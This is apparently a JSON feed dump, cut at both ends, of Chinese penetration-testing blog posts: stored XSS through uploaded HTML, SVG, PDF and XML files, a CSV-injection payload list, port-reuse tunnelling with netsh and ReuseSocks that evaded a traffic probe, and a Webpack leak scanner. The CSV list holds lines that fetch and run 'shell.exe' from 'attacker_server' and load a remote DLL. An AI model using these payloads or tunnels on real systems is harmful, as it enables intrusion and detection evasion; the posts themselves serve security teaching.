\\n <input type=\\"submit\\">\\n</form>\\n\\n\\n
允许上传html或者svg
都可以能导致xss,也能导致任意URL跳转
,甚至还能导致SSRF
(很难利用),因为核心还是js代码可控;其中URL重定向漏洞可以参考之前我在先知写的文章:https://xz.aliyun.com/t/15069
html造成XSS就不多说了,懂得都懂;
\\n主要说说svg文件如何造成xss。
检查思路:
\\n\\n1、创建一个恶意的svg文件,输入如下内容:
\\n\\n<?xml version=\\"1.0\\" encoding=\\"UTF-8\\"?>\\n\\n alert(\'XSS Attack!\');
\\n\\n2、上传到文件中,并访问
\\n可以看到已经成功弹窗出来了XSS漏洞
拓展:如果目标存在导出功能,如给svg导出为pdf这种功能,那么可能存在SSRF
\\n可尝试使用其他协议更直观的查看,如file://
可能存在PDF XSS和任意URL跳转,但是由于属于浏览器层面的漏洞,所以厂商大概率不认可。
\\n\\n可以直接使用工具生成:https://www.xunjiepdf.com/editor
也可以按照网上的操作,用迅捷PDF编辑器去操作,效果都一样
\\n\\n因为pdf一般是后端的组件,有的开发可能配置成
\\nwkhtmltopdf /tmp/html123.htm /uploads/pdf.pdf
,那就可直接利用file协议进行利用
如果网站本身存在预览JS的地方,可以试试通过CVE-2024-4367
来实现PDF XSS 获取Cookie、账户接管等。
如果允许上传CSV文件
,且上传的CSV文件的内容未经过处理过滤直接保存,那么可以尝试上传具有恶意命令执行payload的CSV文件,当其他用户下载该CSV文件时,可能会导致命令执行。
CSV
文件的Payload
如下:
DDE (\\"cmd\\";\\"/C calc\\";\\"!A0\\")A0\\n<span class=\\"label label-primary\\">@SUM(1+9)*cmd</span>|\' /C calc\'!A0\\n=10+20+cmd|\' /C calc\'!A0\\n=cmd|\' /C notepad\'!\'A1\'\\n=cmd|\'/C powershell IEX(wget attacker_server/shell.exe)\'!A0\\n=cmd|\'/c rundll32.exe \\\\\\\\10.0.0.1\\\\3\\\\2\\\\1.dll,0\'!_xlbgnm.A1
\\n\\n检查思路:
\\n\\n等号=
等特殊符号做了处理,payloads会否会成功执行,如果能则说明存在问题师傅们可以看到找到下面的这个站点的这个功能存在文件上传,我先尝试一手html文件,html文件上传相对来讲常见点,并且一般要是能够上传html文件成功,基本上都可以打一个存储型XSS漏洞了
\\n\\nhtml恶意弹窗代码如下:
\\n\\nhtml恶意弹窗代码如下:
\\n\\n<!DOCTYPE html>\\n<html lang=\\"en\\">\\n<head>\\n <meta charset=\\"UTF-8\\">\\n <meta name=\\"viewport\\" content=\\"width=device-width, initial-scale=1.0\\">\\n <title>Document</title>\\n <script>alert(\'618\')</script>\\n</head>\\n<body>\\n \\n</body>\\n</html>
\\n\\n上传成功,可以看到我这里上传的html文件的url路径,下面尝试访问下这个路径,看看里面的html恶意弹窗代码会不会执行
\\n\\n可以看到我这里换个浏览器访问,也是成功执行XSS弹窗了的
\\n\\n上传svg恶意文件也是一样的
\\n\\nsvg恶意弹窗代码如下:
\\n\\n<?xml version=\\"1.0\\" standalone=\\"no\\"?>\\n<!DOCTYPE svg PUBLIC \\"-//W3C//DTD SVG 1.1//EN\\"\\n\\"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\\">\\n<svg version=\\"1.1\\" baseProfile=\\"full\\" xmlns=\\"http://www.w3.org/2000/svg\\">\\n<polygon id=\\"triangle\\" points=\\"0,0 0,50 50,0\\" fill=\\"#009900\\"\\nstroke=\\"#004400\\"/>\\n<script type=\\"text/javascript\\">\\nalert(618);\\n</script>\\n</svg>
\\n\\n\\n也是一样换个浏览器访问,照样是可以成功执行弹窗的
\\n\\npdf编辑器下载地址如下:
\\n\\nhttps://www.xunjiepdf.com/
直接打开然后新建空白页面,然后点击属性,然后点击右边的小点点
\\n\\n然后出现下面的选项框,点击新增js代码
\\n\\n写入app.alert(618);
js代码,然后保存到本地
然后也是按照上面的一样步骤,也是可以打出一个存储型XSS漏洞
\\n\\n上传xml文件必须CORS允许所有域 CORS 跨域资源请求(允许我们网站加载其他网页代码)
xml1:https://xxx.com/File/1/xxxxxx.xml
<?xml version=\\"1.0\\" encoding=\\"iso-8859-1\\"?>\\n\\nalert(/618/);
\\n\\n\\n\\n然后上传xml2,代码中的href填写xml1的上传链接路径
\\n\\n<?xml version=\\"1.0\\" encoding=\\"iso-8859-1\\"?>\\n<?xml-stylesheet type=\\"text/xsl\\" href=\\"\\"?>
\\n\\nCURL查看:curl 域名 -H \\"Origin: https://baidu.com\\" -I
\\n\\n这篇文章对于仪式内容的介绍和分享就到这里了,然后后面要是有什么问题和需要交流的地方,师傅们可以跟我讨论下,里面的一些案例包括各种的打都写的蛮详细的,对小白师傅比较友好哈!
\\n最后,希望这篇文章对师傅们有帮助哈!!!
文章中涉及的敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打码处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行承担!
\\n\\n","description":"0x1 前言 哈喽,师傅们好!\\n 这次打算给师弟们分享的是XSS之Flash弹窗钓鱼和文件上传getshell各种姿势的内容,然后先是给小白师傅们简单介绍下XSS漏洞和文件上传漏洞。然后后面给师傅们简单演示了XSS之Flash弹窗钓鱼,然后后面很详细的介绍了文件上传和XSS漏洞的组合拳的好几种方式,后面也是通过对一个站点的测试,给师傅们演示了一波。后面给师傅们整理了下pdf木马制作的过程以及最后面分享下我一次在测文件上传最后也是getshell了。\\n\\n0x2 漏洞简介\\n文件上传原理\\n\\n这里利用form表单标签和类型为file的Input标签来完成上传…","guid":"https://zone.huoxian.cn/d/2928-src-xss","author":"looklook","authorUrl":null,"authorAvatar":null,"publishedAt":"2024-08-15T11:09:22.994Z","media":[{"url":"https://nc0.cdn.zkaq.cn/md/21977/c12de9f0d6441153a5bdda917a8a7b5f_93825.png","type":"photo","width":1156,"height":914,"blurhash":"LXQ0UDV]tQtP4nbERjjv00f5afog"},{"url":"https://nc0.cdn.zkaq.cn/md/21977/ba7a665f6fd759e810e168a2f084ee01_15924.png","type":"photo","width":1292,"height":661,"blurhash":"LzP%O.-;Rjt700xuRjWB4.Rjofay"},{"url":"https://nc0.cdn.zkaq.cn/md/21977/d50c69aa97e04c84be220cc3b8ae0c21_50234.png","type":"photo","width":1023,"height":705,"blurhash":"LGSF;K-;x]~q-;xaozS29Fs:WWR*"},{"url":"https://nc0.cdn.zkaq.cn/md/21977/e8dede2b7670a92866410c37d1be1f0f_85940.png","type":"photo","width":1391,"height":762,"blurhash":"L13u.p-:s+ROyZs9n$jYf4t7ofW="},{"url":"https://nc0.cdn.zkaq.cn/md/21977/8f662109561aa2ca43f497410164179d_76682.png","type":"photo","width":1406,"height":760,"blurhash":"L12=+ObEI;ju_4bENGaf%MkDV@jF"},{"url":"https://nc0.cdn.zkaq.cn/md/21977/5b28fb4714ae72ac947e4ba17e31cdcb_46482.png","type":"photo","width":1096,"height":524,"blurhash":"L8S~n%~X%g~W*}RRx]RPH?R*WBae"},{"url":"https://nc0.cdn.zkaq.cn/md/21977/44e4e5bbb4b858bb8d69bfdc5747491e_54773.png","type":"photo","width":1361,"height":732,"blurhash":"L12=.WWANIWB_NWTRkWB%LkWV@WV"},{"url":"https://nc0.cdn.zkaq.cn/md/21977/0978346aa93b88ded554944b65d15de8_74234.png","type":"photo","width":1170,"height":515,"blurhash":"LAS~q=_NR%_2rWXRWANF8wkVjFR%"},{"url":"https://nc0.cdn.zkaq.cn/md/21977/2e88f2f5f0e73ca2b24716a82bd45621_64080.png","type":"photo","width":1902,"height":787,"blurhash":"LDRfnN_3?Y_3_4axn}bH_1WVNMRj"},{"url":"https://nc0.cdn.zkaq.cn/md/21977/35986b0da64bc4c9c0184a62324a0ccb_83141.png","type":"photo","width":1920,"height":1007,"blurhash":"LPRfh3?bM{-;9FR*ofWB00RjozRj"},{"url":"https://nc0.cdn.zkaq.cn/md/21977/b9dd119bd9925e1d01f26535c5e34715_43965.png","type":"photo","width":1663,"height":944,"blurhash":"LGRV^Jx_%1?byER4o#of4mT1IUoK"},{"url":"https://nc0.cdn.zkaq.cn/md/21977/6507e60bc4658cf2908aeb148934f455_34643.png","type":"photo","width":1521,"height":846,"blurhash":"LDRymPkUS2~qDiRjW;Rk0Ks;ogW?"},{"url":"https://nc0.cdn.zkaq.cn/md/21977/ccb3c149d20ef2f4b6db7affc929fbcc_98483.png","type":"photo","width":1220,"height":577,"blurhash":"LmMaCZ%MWBt7~Xt8WBoL?HfkfQj["},{"url":"https://nc0.cdn.zkaq.cn/md/21977/0bdcce9caa79102731e4b619f4a8659c_95784.png","type":"photo","width":1055,"height":555,"blurhash":"L55hc8RiDixvM{xuogM{00j@-;Rj"}],"categories":["原创文章","挖洞姿势","应用安全","实战攻防","xss"],"attachments":null,"extra":null,"language":null},{"title":"红蓝对抗| 基于某商全流量设备端口复用流量分析","url":"https://zone.huoxian.cn/d/2927","content":"正值HW,目前在防守,最近看到了一个新项目,端口复用的概念又被拿出来提了一遍,本来以为就是之前依托防火墙的端口转发,看来项目之后确实有点儿区别,无需依托于防火墙的端口复用,在使用效果上确实还错。近期在护网,正好有机会借助厂商全流量监测设备在利用过程中是否产生告警,结果出乎意料。
\\n\\n项目地址
\\n\\n\\n\\n
目标主机
\\n\\n10.10.128.16 目标端口8081
\\n\\n攻击机
\\n\\n192.168.0.100
\\n\\n首先防火墙配置仅8081端口放通
\\n\\nnetsh advfirewall firewall add rule name=\\"Allow Port 8081\\" dir=in action=allow protocol=TCP localport=8081
\\n\\n目标主机作为服务端起服务器
\\n\\nReuseSocks_Server.exe 10.10.128.16 8081 dffa71977e9f0a0e6f0ea6d47e8a17bc
\\n\\n目标主机需执行命令
\\n\\nnetsh interface portproxy add v4tov4 listenport=8081 listenaddress=10.10.128.16 connectport=3306 connectaddress=127.0.0.1
\\n\\n这里将来自防火墙的复用端口8081流量转发至目标主机监听端口3306上
\\n\\n攻击机执行命令
\\n\\nReuseSocks_client.exe -remote 10.10.128.16:8081
\\n攻击机即可通过socks隧道实现穿透。
\\n\\n项目地址
\\n\\n\\n\\n
使用go环境自己编译
\\n\\ngo mod init main\\ngo mod tidy\\ngo build -o port_reuse.exe port_reuse_windows.go
\\n\\n.\\\\port_reuse.exe 10.10.128.16 8081 127.0.0.1 3389 0cbecb8e411599f7f7cd589ed5890293
\\n\\n因为我这里虚拟机使用的是nat模式,访问目标主机应用接收的为网关地址
\\n\\n使用用户名和密码成功登录
\\n\\n对于端口复用的流量分析,该程序在运行时调用了SO_REUSEADDR
,该套接字用于控制在关闭连接或者端口被占用时是否允许重用该端口。当设置 SO_REUSEADDR
选项为 1(true)时,表示可以允许重用端口。
SO_REUSEADDR
的作用是:
具体的实现方法如下:
\\n\\n首先解析命令行参数,包括本地监听的 IP 地址和端口、目标主机的 IP 地址和端口,以及允许访问本地监听端口的来源 IP 地址的 MD5 值。
使用 ListenConfig
对象创建一个监听器 l
,并在其中使用 Control
函数设置 SO_REUSEADDR
选项,以便可以重用本地端口。然后在 l
上调用 Accept
函数,等待来自客户端的连接请求。
当有新的客户端连接到本地监听端口时,启动一个新的 goroutine,并在其中调用 handleClient
函数,传入当前客户端连接、目标主机的 IP 地址和端口,以及需要限制访问来源 IP 地址的 MD5 值。
在 handleClient
函数中,首先连接到指定的目标主机和端口,并在得到目标服务端连接后,启动两个 goroutine,分别进行双向数据传输。
在数据传输过程中,使用较大的缓冲区进行数据读写,并对发生的错误进行处理。如果任何一个 goroutine 完成了数据传输,则关闭另一个连接,从而终止整个转发流程。
如果客户端连接的来源 IP 地址的 MD5 值与预期值不符,则转发到本地监听端口,否则转发到目标主机和端口。
由于虚拟机出现问题了,这边我分析流量更换了机器测试,使用RawCap.exe
抓取本机流量,默认情况下虚拟机走nat模式是无法抓取回环地址的流量的
本机起WEB服务,启动监听模式
\\n\\n分析流量包,根据所有的攻击源和目标主机过滤流量,走的协议都是TCP和TLS协议,TCP的连接端口都为业务端口8081
根据监听状态回传数据可以看出当产生连接时,由目标主机的端口攻击源的流量进行了一个转发,转发到了本机的3389端口
\\n\\n接着对回环地址的流量转发进行重新抓包分析
\\n\\n检索端口tcp.dstport==52957
或者tcp.dstport==3389
可以通过流量看到当进行RDP连接时,所有TCP协议的源和目的都为回环地址,在数据传输的时候走的协议都为TLS
,且目前端口复用打包后过免杀
相同点:
\\n\\n不同点:
\\n\\n基于某厂商全流量
设备探针位置,我测试了过探针进行流量转发的测试,事实上在流量过探针时间,未触发其内置告警规则
警报规则其实也不算多,尝试联系厂家之后确认其设备本身警报规则比较少,规则量也就1W多条
\\n\\n针对本次告警可定制规则
\\n\\n查看目的主机的网络连接状态,对于目的主机连接状态显示的连接端口也为8081,经由目的主机本机端口转发至3389
\\n\\n这种情况针对端口复用的告警规则须同时满足本地端口的转发规则以及复用端口的连接状态监测。但是对于探针而言,是无法监测到目的主机的回环地址的转发状态,所以在实现转发的时候,仅需保证自己的攻击源未被打标签即可规避唯一的风险,规避安全设备基于情报的告警。
\\n\\n","description":"端口复用技术 正值HW,目前在防守,最近看到了一个新项目,端口复用的概念又被拿出来提了一遍,本来以为就是之前依托防火墙的端口转发,看来项目之后确实有点儿区别,无需依托于防火墙的端口复用,在使用效果上确实还错。近期在护网,正好有机会借助厂商全流量监测设备在利用过程中是否产生告警,结果出乎意料。\\n\\n项目地址\\n\\nhttps://github.com/p1d3er/ReuseSocks\\n\\n目标主机\\n\\n10.10.128.16 目标端口8081\\n\\n攻击机\\n\\n192.168.0.100\\n\\n首先防火墙配置仅8081端口放通\\n\\nnetsh advfirewall…","guid":"https://zone.huoxian.cn/d/2927","author":"和","authorUrl":null,"authorAvatar":null,"publishedAt":"2024-08-14T13:06:42.162Z","media":[{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-14/1723640388-661864-image.png","type":"photo","width":1059,"height":95,"blurhash":"LXBq3%kCj[ofD*fRayaz~qj@j[of"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-14/1723640409-904099-image.png","type":"photo","width":1124,"height":270,"blurhash":"L12~P;offQof~qoffQof_3offQof"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-14/1723640446-745974-image.png","type":"photo","width":1192,"height":419,"blurhash":"L04LUZ~q~q~q%MWBRjayM{j[ofof"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-14/1723640472-507439-image.png","type":"photo","width":1199,"height":475,"blurhash":"LnJRp?01Dja#IUt7t6j[4o%Mxuj["},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-14/1723640502-285976-image.png","type":"photo","width":1192,"height":701,"blurhash":"LH8;}r%Lxpxs?wofj[j[_1WBWBWC"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-14/1723640528-438235-image.png","type":"photo","width":1195,"height":529,"blurhash":"LAS$if_3tR_N%Lxtf6R*I.t6V@RQ"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-14/1723640557-79813-image.png","type":"photo","width":967,"height":577,"blurhash":"L042M4_N%M?c%MRjRjV@ay-;xuxu"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-14/1723640592-137112-image.png","type":"photo","width":1194,"height":395,"blurhash":"L03uo}t7Rjxu_3j[ofof9FayofWB"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-14/1723640615-936270-image.png","type":"photo","width":1200,"height":524,"blurhash":"LEO|hUxuay-=0Oa#j[bHkxafaybE"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-14/1723640638-927870-image.png","type":"photo","width":1197,"height":231,"blurhash":"L27K3p}[=x^QGaOXOXODXSNbS3Sg"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-14/1723640660-233711-image.png","type":"photo","width":1199,"height":271,"blurhash":"L77dOVtRM{xa}tW;IUoL$*n%NGo1"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-14/1723640682-573537-image.png","type":"photo","width":1197,"height":519,"blurhash":"LmMt,lt6xYxu~UazRlWEE2j[s.oK"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-14/1723640706-600429-image.png","type":"photo","width":1090,"height":686,"blurhash":"L8SigQ9F4n~q-;D%M{ofRjM{M{WB"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-14/1723640726-139268-image.png","type":"photo","width":1199,"height":326,"blurhash":"LPSr+O=_X.*JxubHaee.T0X8ena0"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-14/1723640741-901526-image.png","type":"photo","width":1202,"height":377,"blurhash":"LBRftgwQ9f%%^+IWs-xYwHM}s,$|"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-14/1723640759-796305-image.png","type":"photo","width":1199,"height":354,"blurhash":"LTAd7fj[WBj[~qa{ayfQ~qayayj["},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-14/1723640784-546191-image.png","type":"photo","width":1011,"height":162,"blurhash":"L45=62?b~p_3M{fRj[j[%Mj[j[j["}],"categories":["原创文章","实战攻防"],"attachments":null,"extra":null,"language":null},{"title":"实战攻防 | 针对JS路径的泄露和Webpack漏洞的初探","url":"https://zone.huoxian.cn/d/2926-jswebpack","content":"这篇文章给师傅们分享下前段时间跟其他师傅学习和交流的Webpack相关漏洞,这个漏洞相对来说比较冷门,在web漏洞中不是那么的热度高,但是平常去挖掘和发现这个漏洞相对来说还是不难的。
\\n\\n后面要是有机会可以给师傅们分享下油猴的相关脚本去找Webpack漏洞泄露的js敏感路径,然后打一波Webpack漏洞。在企业src和众测中有些平台还是收的,不收的话就当学习了,收了咱们就赚了哈!
\\n\\nWebpack是一个JavaScript应用程序的静态资源打包器(module bundler)。它会递归构建一个依赖关系图(dependency graph),其中包含应用程序需要的每个模块,然后将所有这些模块打包成一个或多个bundle。大部分Vue等应用项目会使用Webpack进行打包,如果没有正确配置,就会导致项目源码泄露,可能泄露的各种信息如API、加密算法、管理员邮箱、内部功能等等。
\\n\\nwebpack是一个打包工具,他的宗旨是一切静态资源皆可打包。有人就会问为什么要webpack?
\\nwebpack是现代前端技术的基石,常规的开发方式,比如jquery,html,css静态网页开发已经落后了。
现在是MVVM的时代,数据驱动界面。webpack它做的事情是,分析你的项目结构,找JavaScript模块以及其它的一些浏览器不能直接运行的拓展语言(Scss,TypeScript等),并将其打包为合适的格式以供浏览器使用。
\\n\\n最简单的看出来这个站点是不是webpack打包的站点,直接使用下面的wappalyzer工具进行查看
\\n\\nhttps://github.com/rtcatc/Packer-Fuzzer?tab=readme-ov-file
随着WEB前端打包工具的流行,您在日常渗透测试、安全服务中是否遇到越来越多以Webpack打包器
为代表的网站?这类打包器会将整站的API和API参数打包在一起供Web集中调用,这也便于我们快速发现网站的功能和API清单,但往往这些打包器所生成的JS文件数量异常之多并且总JS代码量异常庞大(多达上万行),这给我们的手工测试带来了极大的不便,Packer Fuzzer软件应运而生。
本工具支持自动模糊提取对应目标站点的API以及API对应的参数内容,并支持对:未授权访问、敏感信息泄露、CORS、SQL注入、水平越权、弱口令、任意文件上传七大漏洞进行模糊高效的快速检测。在扫描结束之后,本工具还支持自动生成扫描报告,您可以选择便于分析的HTML版本以及较为正规的doc、pdf、txt版本。
\\n\\n我们首先得把源码下载下来,然后丢到mac系统或者linux系统下
\\n\\n我这边的云服务器是Centos的系统,可以参考我运行的命令如下:
\\n\\n1、sudo yum -y install epel-release && sudo yum install python3 && yum install -y python3-setuptools && easy_install pip\\n\\n2、sudo yum -y install nodejs\\n\\n3、pip3 install -r requirements.txt
\\n\\n要是中途出错误,可以放到GPT里面问问,然后按照它的建议来执行命令
\\n\\n直接开始使用这个工具进行网站检测
\\n\\npython3 PackerFuzzer.py -u \\"IP\\" -l zh\\n\\n//-u 接url地址\\n//-l zh 是显示中文的意思 因为这个工具默认是英文
\\n\\n然后检测完成以后,检测的报告会在reports目录下
\\n\\n这个工具因为是模糊匹配检测,所有不一定扫描结果都正确,所以后面还是需要进行验证
\\n\\n然后我把生成的报告可以放到本地去利用word文档打开,可以看到下面的word文档,这个工具自动帮你把里面的js文件包括漏洞报告都给你写好了,感觉要是给甲方爸爸用用还是蛮不错的一个工具哈!
\\n\\n里面扫描出来的很多的 js文件,要是懂js的师傅可以尝试分析下,很容易打出js接口信息泄露的相关漏洞
\\n\\n这篇文章对于Webpack相关的漏洞先介绍到这里,然后后面会给师傅们分享下我利用Webpack的相关插件和脚本工具在某src的一次实战经验分享。当时就是利用脚本把改站点的js.map包下载本地,然后反编译,然后拿到很多的js泄露文件,里面有很多的敏感信息文件的泄露。
\\n\\n文章中涉及的敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打码处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行承担!
\\n\\n","description":"0x1前言 浅谈\\n\\n这篇文章给师傅们分享下前段时间跟其他师傅学习和交流的Webpack相关漏洞,这个漏洞相对来说比较冷门,在web漏洞中不是那么的热度高,但是平常去挖掘和发现这个漏洞相对来说还是不难的。\\n\\n后面要是有机会可以给师傅们分享下油猴的相关脚本去找Webpack漏洞泄露的js敏感路径,然后打一波Webpack漏洞。在企业src和众测中有些平台还是收的,不收的话就当学习了,收了咱们就赚了哈!\\n\\n0x2 Webpack简介\\n\\nWebpack是一个JavaScript应用程序的静态资源打包器(module bundler…","guid":"https://zone.huoxian.cn/d/2926-jswebpack","author":"looklook","authorUrl":null,"authorAvatar":null,"publishedAt":"2024-08-05T10:40:18.896Z","media":[{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-05/1722854142-414078-image.png","type":"photo","width":800,"height":560,"blurhash":"LQMQkt%MD%tS0zWBDiM|E2IpM_RP"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-05/1722854194-760638-image.png","type":"photo","width":1220,"height":532,"blurhash":"LF6u-PkCH;j@o}fQV?f6H;ayyYj]"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-05/1722854220-50979-image.png","type":"photo","width":881,"height":758,"blurhash":"LtPP[zi{V[t74oogj]WA01ayofof"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-05/1722854243-61015-image.png","type":"photo","width":1474,"height":1716,"blurhash":"LAC%8J_300IU-;WURjof00IUxuxu"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-05/1722854258-591406-image.png","type":"photo","width":1340,"height":740,"blurhash":"L35#eMs:4n%N_3xuIVR%4T%M-;IA"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-05/1722854273-141214-image.png","type":"photo","width":1690,"height":838,"blurhash":"L44_tks:D$xu%Mt7RkRj4mof-;M{"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-05/1722854296-450804-image.png","type":"photo","width":1507,"height":849,"blurhash":"L45OQp%MIT%Mx]xuofWV00of-;M{"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-05/1722854310-686924-image.png","type":"photo","width":1759,"height":754,"blurhash":"LER{rn-pt7?b_Nx]ofaeaebbf6a|"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-05/1722854322-989301-image.png","type":"photo","width":913,"height":722,"blurhash":"LIRo~ioL_3~q?vozM{xuRjoLkCof"}],"categories":["原创文章","挖洞姿势","应用安全","实战攻防","信息收集"],"attachments":null,"extra":null,"language":null},{"title":"实战内测-某内测项目上传多种类型文件打XSS漏洞","url":"https://zone.huoxian.cn/d/2925-xss","content":"这个站点也是最近碰到的,这个上传的功能点可以上传很多种类型的文件,打一个XSS漏洞。然后最近在高Flash钓鱼网站
的打法,于是就出一篇上传多种类型文件打XSS漏洞
的文章,后面再给师傅们出一篇利用Flash钓鱼拿管理员后台的文章。希望大家一起交流交流。
在平时工作中,总是会接触过很多文件上传的功能,因为用惯了各种操作库来处理,所以总有一种云里雾里的感觉,没有清晰的思路,归根到底还是没有理解文件上传的原理。接下来将揭起工具库的面纱,看看文件上传到底是怎么一回事,深入了解文件上传的本质。
\\n\\n这里利用form表单标签
和类型为file的Input标签来完成上传,要将表单数据编码格式置为 multipart/form-data 类型
,这个编码类型会对文件内容在上传时进行处理,以便服务端处理程序解析文件类型与内容,完成上传操作。
<form method=\\"POST\\" enctype=\\"multipart/form-data\\">\\n <input type=\\"file\\" name=\\"file\\" value=\\"请选择文件\\"><br />\\n <input type=\\"submit\\">\\n</form>
\\n\\nXSS(跨站脚本攻击)是一种常见的网络安全漏洞,攻击者通常会在网页中插入恶意的 JavaScript代码。由于服务器对输入数据的过滤和验证不严格,这些恶意的 JavaScript代码
会被当作响应的一部分返回给客户端。当浏览器解析来自服务器的响应时,它会执行这些恶意的JavaScript代码
,从而导致攻击者能够执行恶意操作。
师傅们可以看到找到下面的这个站点的这个功能存在文件上传,我先尝试一手html文件,html文件上传相对来讲常见点,并且一般要是能够上传html文件成功,基本上都可以打一个存储型XSS漏洞了
\\n\\nhtml恶意弹窗代码如下:
\\n\\n<!DOCTYPE html>\\n<html lang=\\"en\\">\\n<head>\\n <meta charset=\\"UTF-8\\">\\n <meta name=\\"viewport\\" content=\\"width=device-width, initial-scale=1.0\\">\\n <title>Document</title>\\n <script>alert(\'618\')</script>\\n</head>\\n<body>\\n</body>\\n</html>
\\n\\n上传成功,可以看到我这里上传的html文件的url路径,下面尝试访问下这个路径,看看里面的html恶意弹窗代码会不会执行
\\n\\n可以看到我这里换个浏览器访问,也是成功执行XSS弹窗了的
\\n\\n上传svg恶意文件也是一样的
\\n\\nsvg恶意弹窗代码如下:
\\n\\n<?xml version=\\"1.0\\" standalone=\\"no\\"?>\\n<!DOCTYPE svg PUBLIC \\"-//W3C//DTD SVG 1.1//EN\\"\\n\\"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\\">\\n<svg version=\\"1.1\\" baseProfile=\\"full\\" xmlns=\\"http://www.w3.org/2000/svg\\">\\n<polygon id=\\"triangle\\" points=\\"0,0 0,50 50,0\\" fill=\\"#009900\\"\\nstroke=\\"#004400\\"/>\\n<script type=\\"text/javascript\\">\\nalert(618);\\n</script>\\n</svg>
\\n\\n也是一样换个浏览器访问,照样是可以成功执行弹窗的
\\n\\npdf编辑器下载地址如下:
\\n\\nhttps://www.xunjiepdf.com/
直接打开然后新建空白页面,然后点击属性,然后点击右边的小点点
\\n\\n然后出现下面的选项框,点击新增js代码
\\n\\n写入app.alert(618);
js代码,然后保存到本地
然后也是按照上面的一样步骤,也是可以打出一个存储型XSS漏洞
\\n\\n这篇文章主要是给师傅们分享下文件上传和存储型XSS漏洞的一个组合拳,然后给师傅们演示了一个实战案例,通过多种不一样的文件类型上传然后打一个XSS漏洞,并都成功弹窗,后面给师傅们演示了pdf木马的生成过程。希望对师傅们有帮助哈!
\\n\\n文章中涉及的敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打码处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行承担!
\\n\\n\\n","description":"0x1 前言 这个站点也是最近碰到的,这个上传的功能点可以上传很多种类型的文件,打一个XSS漏洞。然后最近在高Flash钓鱼网站的打法,于是就出一篇上传多种类型文件打XSS漏洞的文章,后面再给师傅们出一篇利用Flash钓鱼拿管理员后台的文章。希望大家一起交流交流。\\n\\n0x2 漏洞简介\\n文件上传漏洞原理\\n\\n在平时工作中,总是会接触过很多文件上传的功能,因为用惯了各种操作库来处理,所以总有一种云里雾里的感觉,没有清晰的思路,归根到底还是没有理解文件上传的原理。接下来将揭起工具库的面纱,看看文件上传到底是怎么一回事,深入了解文件上传的本质。\\n\\n这里利用fo…","guid":"https://zone.huoxian.cn/d/2925-xss","author":"looklook","authorUrl":null,"authorAvatar":null,"publishedAt":"2024-08-05T08:38:21.775Z","media":[{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-05/1722846674-315317-image.png","type":"photo","width":898,"height":504,"blurhash":"LNEpA+-:-U?a^+0JIU-px]4:Ipxu"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-05/1722846711-3340-image.png","type":"photo","width":1391,"height":762,"blurhash":"L13u.p-:s+ROyZs9n$jYf4t7ofW="},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-05/1722846742-946010-image.png","type":"photo","width":1472,"height":797,"blurhash":"L12=+Oa^I;f7_4bENHae%LkWV@e."},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-05/1722846752-813914-image.png","type":"photo","width":1096,"height":524,"blurhash":"L8S~n%~X%g~W*}RRx]RPH?R*WBae"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-05/1722846764-823767-image.png","type":"photo","width":1361,"height":732,"blurhash":"L12=.WWANIWB_NWTRkWB%LkWV@WV"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-05/1722846814-388309-image.png","type":"photo","width":1170,"height":515,"blurhash":"LAS~q=_NR%_2rWXRWANF8wkVjFR%"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-05/1722846846-311071-image.png","type":"photo","width":1902,"height":787,"blurhash":"LDRfnN_3?Y_3_4axn}bH_1WVNMRj"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-05/1722846857-967499-image.png","type":"photo","width":1920,"he